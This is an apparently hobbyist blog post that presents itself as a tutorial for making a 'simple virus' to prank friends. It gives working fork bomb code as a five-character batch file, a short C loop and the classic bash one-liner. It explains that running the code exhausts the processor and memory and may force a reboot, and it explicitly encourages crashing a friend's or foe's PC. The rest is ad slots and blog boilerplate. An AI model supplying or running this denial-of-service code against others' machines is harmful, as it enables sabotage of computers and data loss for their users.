Your Ad Here

Click Below For Full Access

Your Ad Here

0 Make A Simple Virus To Make Fun With Your Friends System

Your Ad Here


A virus (as you know) is a piece of code that does something that it shouldn't. It is a common misconception that you need a vast skill set to make these and that they are extremely complex however in reality they are as simple as sin to make which is why they are so damn annoying.
A Fork bomb is considered to be the smallest writable virus in the batch language and it is capable of being annoying and if launched on a home computer however on a server will probably result in a crash.
A fork bomb creates two instances which each create two instances and so on..the processes recursively fork, this "forks" the processor and jamm it completely until a crash occurs.
Here is how to make it
open up notepad and type:

%0|%0
and save it as fork.bat Yep..its a virus of just 5 characters :P .
On double clicking this file,it will lead to total CPU jam by opening about 500+ process of command prompt .
Here is a in C++ version of Fork bomb
#include
int main(void)
{
  while(1)
    fork();
  return 0;
}
and a shell (Unix/bash) version
:(){ :|:& };:
Once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation. Stopping a fork bomb requires destroying all running instances of it. Trying to use a program to kill the rogue processes normally requires creating another process  a difficult or impossible task as it will totally use memory for its instances.
Use it for crashing your friends/foe’s PC  :P .
Your Ad Here
As a 17 Year Old Student,The Only Income i rely is my Pocket money.Bearing The Running Costs Of This Site Is Really Very Difficult.We Provide Enormous Information About Internet.To help us go forward with the same spirit, a small contribution from your side will highly be appreciated.

Kindly Bookmark and Share it:

0 responses:

Post a Comment | Feed

Post a Comment



 

Visitor No.

Free Counter

Rank

About Me

To leave a comment use any Browser But not IE 6! You Can Use IE 7 or 8
Do not use IE 7.0 I am An Indian Who Loves Web AndTechnology

Privacy Policy

We do not host or upload any of these movies or any other content that are available on this Weblog. We merely search on internet and index popular games openly available to anyone.Please contact us through email, if you feel that any content including videos on this blog are objectionable or violating your copyrights. The objectionable content shall be promptly removed from our blog.Because we don't maintain the files, we cannot fix broken links. If you find a broken link let us know and, if possible, we'll tray to find a new link. We Donot Claim Any Originality For The Items Displayed On This Website.

The Best Tips Tricks and Tutorials by Jayaraj Yadav Copyright © 2009-10 Proudly Powered By Blogger